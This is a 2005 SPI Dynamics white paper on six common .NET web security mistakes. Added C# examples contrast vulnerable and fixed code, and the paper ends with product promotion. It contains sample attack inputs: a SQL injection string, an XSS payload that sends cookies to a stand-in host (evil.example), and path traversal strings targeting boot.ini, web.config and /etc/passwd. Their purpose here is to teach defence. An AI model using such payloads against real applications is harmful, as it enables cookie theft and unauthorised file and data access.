Start Secure. Stay Secure.™

The Top Six Security Mistakes .NET Developers Make
Are your web applications vulnerable?

© 2005 SPI Dynamics, Inc. All Rights Reserved. No reproduction or redistribution without written permission.

Table of Contents

The Top Six Security Mistakes .NET Developers Make
  1. Not Integrating Security into Development Process
  2. SQL Injection
  3. Cross-Site Scripting
  4. Using User Input for File Names
  5. Improper Use of Cookies and Hidden Parameters
  6. Enabling Debug Options in the Web.Config File
The Business Case for Application Security
About SPI Labs
About SPI Dynamics
About the WebInspect Product Line
Contact Information

The Top Six Security Mistakes .NET Developers Make

Industry analysts estimate that more than 70 percent of today's security breaches occur at the application level. Many are due to the exploitation of security defects within the code. Microsoft has added a tremendous number of features to the .NET environment to help developers create secure applications. For example, authentication has become an integrated part of the development environment, and debug messages are now disabled by default. This renewed focus on security has prodded developers into re-evaluating the importance of integrating protective safeguards into their software development process. Not everyone does it well, however. Here are the mistakes .NET developers make most often, according to the Customer Service records of SPI Dynamics, Inc.

1. Not Integrating Security into Development Process

Coding applications securely, if done as part of the entire development process, has a minimal impact on development timelines and cost. Additionally, secure development practices lead to applications that are more robust and less error-prone than insecure applications.
However, if security is not considered until the QA or User Acceptance phase of the product life cycle, it can cause a great deal of rework, delays and cost overruns.

2. SQL Injection

SQL injection is the act of passing SQL code not intended by the developer into an application. These attack strings are composed of fragments of SQL syntax that will be executed on the database server if the web application inserts the string into the text of a SQL statement, instead of handing it to the database as a parameter, without first validating it. For example, problems arise when a developer does not protect against potentially malicious input such as an apostrophe ( ' ): it closes the string literal the developer intended, so whatever follows it is executed as SQL. This can give the user unintended access to the data and, depending on the privileges of the database account, to the database server itself.

3. Cross-Site Scripting

Cross-site scripting is caused by taking user input and returning it to the user without proper encoding. Cross-site scripting (also known as XSS, and in older literature as CSS) occurs when dynamically generated web pages display input that is not properly validated. This allows an attacker to embed malicious JavaScript code into the generated page and have it execute in the browser of any user who views that page. An attacker who uses cross-site scripting successfully might compromise confidential information, manipulate or steal cookies, create requests that are mistaken for those of a valid user, or execute malicious code on end-user systems. The defence is to validate input and, above all, to HTML-encode every user-supplied value at the point where it is written into the page.

4. Using User Input for File Names

Developers frequently use a parameter to determine which file should be shown to the end user.

Example: myPageGenerator.aspx?Template=Welcome.html

If this type of feature is used, it is critical to ensure that the file requested is in the proper folder.
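The following C# console program is an added example, not code from the SPI Dynamics paper. It shows mistakes 2 and 3 above, SQL injection and cross-site scripting, in one small product-search handler, beside the hardened form of each. The table name Products, the parameter name @term and the two attack strings are constructed for the illustration; no database connection is opened, the program only builds the SQL command and the HTML fragment so the effect of the input is visible.

```csharp
// Added example, not part of the SPI Dynamics paper. Assumes a table Products(Name, Price);
// nothing here opens a database connection, the commands are only built and printed.
using System;
using System.Data;
using System.Data.SqlClient;   // System.Data.SqlClient NuGet package on .NET Core / .NET 5+
using System.Net;

public static class ProductSearch
{
    // MISTAKE 2: the search term is pasted into the statement text, so an apostrophe
    // in the input closes the literal and everything after it runs as SQL.
    public static string VulnerableSql(string term)
    {
        return "SELECT Name, Price FROM Products WHERE Name LIKE '%" + term + "%'";
    }

    // MISTAKE 3: the same input is written straight into the page, so a <script> tag
    // is interpreted by the browser instead of being shown as text.
    public static string VulnerableHtml(string term)
    {
        return "<p>Results for: " + term + "</p>";
    }

    // FIX for 2: the statement text is constant; the value travels as a typed parameter
    // and can never change the shape of the query, whatever characters it contains.
    public static SqlCommand SafeCommand(string term, SqlConnection connection)
    {
        var command = new SqlCommand(
            "SELECT Name, Price FROM Products WHERE Name LIKE '%' + @term + '%'", connection);
        command.Parameters.Add("@term", SqlDbType.NVarChar, 100).Value = term;
        return command;
    }

    // FIX for 3: encode at the point of output so <, >, &, " and ' become entities
    // and the browser renders the input as text.
    public static string SafeHtml(string term)
    {
        return "<p>Results for: " + WebUtility.HtmlEncode(term) + "</p>";
    }

    public static void Main()
    {
        // Constructed attack inputs.
        string sqlAttack = "x' OR '1'='1' --";
        string xssAttack = "<script>document.location='http://evil.example/?c='+document.cookie</script>";

        // In the concatenated statement the apostrophe after "x" closes the literal,
        // OR '1'='1' is always true and "--" comments out the trailing "%'": every row matches.
        Console.WriteLine("Vulnerable SQL : " + VulnerableSql(sqlAttack));

        using (var connection = new SqlConnection())   // never opened in this example
        using (var command = SafeCommand(sqlAttack, connection))
        {
            // The statement text is unchanged; the attack string is merely a LIKE pattern.
            Console.WriteLine("Parameterized  : " + command.CommandText);
            Console.WriteLine("  @term        = " + command.Parameters["@term"].Value);
        }

        Console.WriteLine("Vulnerable HTML: " + VulnerableHtml(xssAttack));
        Console.WriteLine("Encoded HTML   : " + SafeHtml(xssAttack));
    }
}
```

Parameterization fixes the injection, but note that "%" and "_" in the term are still LIKE wildcards; escape them (or restrict the allowed characters) if that matters to the search. Encoding belongs where the value is emitted, not where it is read, because the same value may later be written into an attribute, a script block or a URL, each of which needs its own encoding.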
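The check called for in mistake 4, as an added C# example that is not code from the SPI Dynamics paper. The folder name Templates under the application's base directory and the rule that a template must end in .html are assumptions for the illustration; the program resolves the requested name to a canonical path and refuses anything that does not land inside the template folder.

```csharp
// Added example, not part of the SPI Dynamics paper. Assumes templates live in a
// "Templates" folder beneath the application's base directory (hypothetical layout).
using System;
using System.IO;

public static class TemplateLoader
{
    private static readonly string TemplateRoot =
        Path.GetFullPath(Path.Combine(AppContext.BaseDirectory, "Templates"));

    // MISTAKE 4: the query-string value is used as the file name as-is.
    // "../../boot.ini" walks out of TemplateRoot; an absolute path such as
    // "/etc/passwd" is even worse, because Path.Combine simply returns it unchanged.
    public static string VulnerablePath(string template)
    {
        return Path.Combine(TemplateRoot, template);
    }

    // FIX: accept only a bare file name with the expected extension, then confirm that
    // the canonical path still starts with the template folder. Returns null when rejected.
    public static string SafePath(string template)
    {
        if (string.IsNullOrWhiteSpace(template))
            return null;

        // Any directory component ("..", a slash, a drive letter) is rejected outright:
        // GetFileName keeps only the last segment, so it differs from the input if one existed.
        if (Path.GetFileName(template) != template)
            return null;

        if (!template.EndsWith(".html", StringComparison.OrdinalIgnoreCase))
            return null;

        // Defence in depth: resolve and check containment even though the name looks clean.
        string full = Path.GetFullPath(Path.Combine(TemplateRoot, template));
        string rootWithSeparator = TemplateRoot.TrimEnd(Path.DirectorySeparatorChar)
                                   + Path.DirectorySeparatorChar;
        if (!full.StartsWith(rootWithSeparator, StringComparison.OrdinalIgnoreCase))
            return null;

        return full;
    }

    public static void Main()
    {
        // Constructed inputs: the legitimate one from the paper and three hostile ones.
        string[] requests =
        {
            "Welcome.html",
            "../../../../../../boot.ini",
            "..\\..\\web.config",
            "/etc/passwd",
        };

        foreach (string request in requests)
        {
            Console.WriteLine("Template=" + request);
            Console.WriteLine("  unchecked path: " + VulnerablePath(request));
            Console.WriteLine("  checked path  : " + (SafePath(request) ?? "REJECTED"));
        }
    }
}
```

The containment test on the resolved path is the part that must never be skipped: filtering "../" out of the raw parameter is not enough, because ASP.NET has already URL-decoded the query string by the time the handler sees it, and Path.Combine discards the root entirely when the second argument is itself an absolute path. Where the set of templates is known, matching the parameter against a fixed list of names is simpler and stricter still.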
A hacker can change the query string to the following and potentially gain access to inappropriate files:

Hacker Example: myPageGenerator.aspx?Template=../../../../../../boot.ini

Each "../" steps up one directory, so the request escapes the template folder and, if the worker process has read access, returns a file the application never meant to serve. The check must therefore be made on the resolved path, not on the raw parameter, and ideally the parameter is matched against a fixed list of allowed file names.

5. Improper Use of Cookies and Hidden Parameters

Developers frequently store information in cookies and hidden parameters. Cookies are small pieces of information that are sent from the server to the client browser in an HTTP header. Hidden parameters are name and value attributes for hidden controls in an HTML form. Many web servers use cookies to store session tokens and other session-based tokens. Common mistakes include putting product pricing, credit card numbers, account numbers and other critical information in cookies and hidden parameters. Developers must keep in mind that a hacker can easily read and change a cookie or a hidden field before the browser sends it back, so the server must never trust such a value: keep it in server-side session state or the database, or at least verify it against the server-side copy on every request.

6. Enabling Debug Options in the Web.Config File

The <customErrors> section of the Web.Config file tells a .NET application how to deal with errors. An application should never show an end user a detailed error message. Instead, it should show a "friendly" message that says the site is having technical difficulties and NOT give any technical details. Hackers gain a tremendous amount of information from error messages (stack traces, source file paths, SQL statements and the framework version); enabling detailed error messages in an ASP.NET application is a major security concern.

The following table shows the possible settings of the mode attribute:

Setting      Description*
Off          Always display detailed ASP.NET error information. This option should NEVER be used in a production environment.
On           Always display custom (friendly) messages.
RemoteOnly   Display custom (friendly) messages only to users not running on the local Web server.
             This setting is recommended for security purposes so that you do not display application detail information to remote clients.

* Descriptions taken from the default Web.Config file generated by Microsoft Visual Studio .NET.

The Business Case for Application Security

Whether a security breach is made public or confined internally, the fact that a hacker has accessed your sensitive data should be a huge concern to your company, your shareholders and, most importantly, your customers. SPI Dynamics has found that the majority of companies that are vigilant and proactive in their approach to application security are better protected. In the long run, these companies enjoy a higher return on investment for their e-business ventures.

About SPI Labs

SPI Labs is the dedicated application security research and testing team of SPI Dynamics. Composed of some of the industry's top security experts, SPI Labs is focused specifically on researching security vulnerabilities at the web application layer. The SPI Labs mission is to provide objective research to the security community and all organizations concerned with security practices. SPI Dynamics uses direct research from SPI Labs to provide daily updates to WebInspect, the leading web application security assessment software. SPI Labs engineers comply with the standards proposed by the Internet Engineering Task Force (IETF) for responsible security vulnerability disclosure. SPI Labs policies and procedures for disclosure are outlined on the SPI Dynamics web site at: http://www.spidynamics.com/spilabs.html.

About SPI Dynamics

SPI Dynamics, the expert in web application security assessment, provides software and services to help enterprises protect against the loss of confidential data through the web application layer.
The company's flagship product line, WebInspect, assesses the security of an organization's applications and web services, the most exposed yet least protected IT infrastructure component. Since its inception, SPI Dynamics has focused exclusively on web application security. SPI Labs, the internal research group of SPI Dynamics, is recognized as the industry's foremost authority in this area. Software developers, quality assurance professionals, corporate security auditors and security practitioners use WebInspect products throughout the application lifecycle to identify security vulnerabilities that would otherwise go undetected by traditional measures. The security assurance provided by WebInspect helps Fortune 500 companies and organizations in regulated industries -- including financial services, health care and government -- protect their sensitive data and comply with legal mandates and regulations regarding privacy and information security. SPI Dynamics is privately held with headquarters in Atlanta, Georgia.

About the WebInspect Product Line

The WebInspect product line ensures the security of your entire network with intuitive, intelligent, and accurate processes that dynamically scan standard and proprietary web applications to identify known and previously unidentified application vulnerabilities. WebInspect products provide a new level of protection for your critical business information. With WebInspect products, you find and correct vulnerabilities at their source, before attackers can exploit them.
Whether you are an application developer, security auditor, QA professional or security consultant, WebInspect provides the tools you need to ensure the security of your web applications through a powerful combination of unique Adaptive-Agent™ technology and SPI Dynamics' industry-leading and continuously updated vulnerability database, SecureBase™. Through Adaptive-Agent technology, you can quickly and accurately assess the security of your web content, regardless of your environment. WebInspect enables users to perform security assessments for any web application, including these industry-leading application platforms:

  Macromedia ColdFusion
  Lotus Domino
  Oracle Application Server
  Macromedia JRun
  BEA WebLogic
  Jakarta Tomcat

Contact Information

SPI Dynamics
115 Perimeter Center Place
Suite 1100
Atlanta, GA 30346
Telephone: (678) 781-4800
Fax: (678) 781-4850
Email: info@spidynamics.com
Web: www.spidynamics.com